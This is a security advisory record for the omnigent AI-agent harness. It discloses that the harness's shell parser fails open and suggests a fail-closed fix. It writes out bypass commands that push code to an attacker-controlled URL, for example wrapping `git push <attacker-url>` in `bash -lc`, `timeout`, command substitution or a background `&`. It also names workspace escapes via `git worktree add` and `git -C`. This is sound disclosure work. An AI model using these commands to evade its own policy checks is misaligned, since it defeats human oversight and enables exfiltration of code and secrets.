{"id":"PYSEC-2026-3873","summary":"Omnigent Guardrail policy bypass: shell-command parser fails open in policies/builtins/_shell.py","details":"**Reporter:** Aaron / Aeon — autonomous security agent (https://github.com/aaronjmars/aeon)\n**Project:** `omnigent-ai/omnigent` v0.1.0 (Databricks) — meta-harness running Claude Code / Codex / Pi \"in check with policies and sandboxing\"\n**Component:** `omnigent/policies/builtins/_shell.py` (shared parser) → consumed by `policies/builtins/github.py` (`write_repos`/`write_branches` allowlist) and `policies/builtins/working_dir.py` (workspace confinement)\n\n## Summary\n\nThe shared shell-command parser **fails open**. When a gated command spells something the parser doesn't recognize, it produces no operation, the policy evaluator returns `None`, and `None` = abstain = **ALLOW**. So any command the parser misses bypasses both the GitHub repo/branch allowlist and the working-directory confinement — the product's two core safety guarantees.\n\n## Impact\n\nA misaligned or prompt-injected agent that is *meant to be confined* can:\n\n- `git push` to an attacker-controlled repo (code / secret exfiltration),\n- push to a protected branch,\n- escape its workspace via `git worktree add` / `git -C \u003cother-dir\u003e`.\n\n## Bypass classes (all verified against the real policy code)\n\n- **Combined interpreter flags:** `bash -lc \"git push \u003cattacker-url\u003e\"`\n- **Unlisted wrappers:** `timeout` / `nice` / `setsid` / `stdbuf … git push …`\n- **Command substitution:** `x=$(git push \u003cattacker-url\u003e)`\n- **Un-split background operator:** `true & git push \u003cattacker-url\u003e`\n\nControls that **correctly hold** (confirming this is parser incompleteness, not an allowlist logic error): bare `git push \u003cattacker-url\u003e` and `env git push …` both **DENY**.\n\n## Suggested fix\n\nMake the gated surface **fail closed**:\n\n1. An unrecognized gated command must **DENY**, not return `None` → ALLOW. Abstain on a security gate should resolve to deny, not allow.\n2. Canonicalize known wrappers (`timeout` / `nice` / `setsid` / `stdbuf` / `env`) down to their inner command before evaluation.\n3. Recurse into `sh -c` / `bash -c` payloads and command substitutions, and split on shell control operators (`;`, `&`, `&&`, `||`, `|`) before judging each segment.","aliases":["CVE-2026-62676","GHSA-7mqg-cx4g-x2rf"],"modified":"2026-09-10T12:15:09.111299206Z","published":"2026-09-10T09:44:59.740515Z","references":[{"type":"WEB","url":"https://github.com/omnigent-ai/omnigent/security/advisories/GHSA-7mqg-cx4g-x2rf"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-62676"},{"type":"WEB","url":"https://github.com/omnigent-ai/omnigent/pull/389"},{"type":"WEB","url":"https://github.com/omnigent-ai/omnigent/commit/1a05b7b139ef504bf2be89bf37918abe104fb95c"},{"type":"PACKAGE","url":"https://github.com/omnigent-ai/omnigent"},{"type":"WEB","url":"https://github.com/omnigent-ai/omnigent/releases/tag/v0.3.0"},{"type":"PACKAGE","url":"https://pypi.org/project/omnigent"},{"type":"ADVISORY","url":"https://github.com/advisories/GHSA-7mqg-cx4g-x2rf"}],"affected":[{"package":{"name":"omnigent","ecosystem":"PyPI","purl":"pkg:pypi/omnigent"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"0.3.0"}]}],"versions":["0.0.1rc1","0.0.1rc2","0.1.0","0.1.0rc1","0.1.0rc2","0.1.0rc3","0.1.0rc4","0.1.1","0.1.1rc2","0.2.0","0.2.0rc1","0.3.0rc1"],"database_specific":{"source":"https://github.com/pypa/advisory-database/blob/main/vulns/omnigent/PYSEC-2026-3873.yaml"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N"}]}